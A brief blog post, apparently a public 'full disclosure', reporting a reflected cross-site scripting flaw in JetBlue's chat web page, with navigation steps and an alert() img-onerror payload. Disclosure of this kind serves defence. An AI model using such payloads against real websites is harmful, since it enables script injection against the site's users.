Sunday, 19 March 2023

Full Disclosure - JetBlue Reflected Cross Site Script

 Application

  • JetBlue chat web page

Information

  • Input not validated
  • Reflect Cross Site Scripting flaw

Exploit

XSS #1



1. Browse to Online Website

2. Select "/deals/from/new-york-city" page -> Search

2. Select Pages -> Have General Question -> Ask now

3. Paste Payload -> TEST"><img src=x onerror=alert(1)>


No comments:

Post a Comment

Friday Fun Pentest Series - 46 - Stored Cross-Site Scripting (XSS) via SVG File Upload - totaljsv5013

Description - It was noted that the applications file upload functionality was vulnerable to Stored Cross-Site Scripting (XSS) via an SVG im...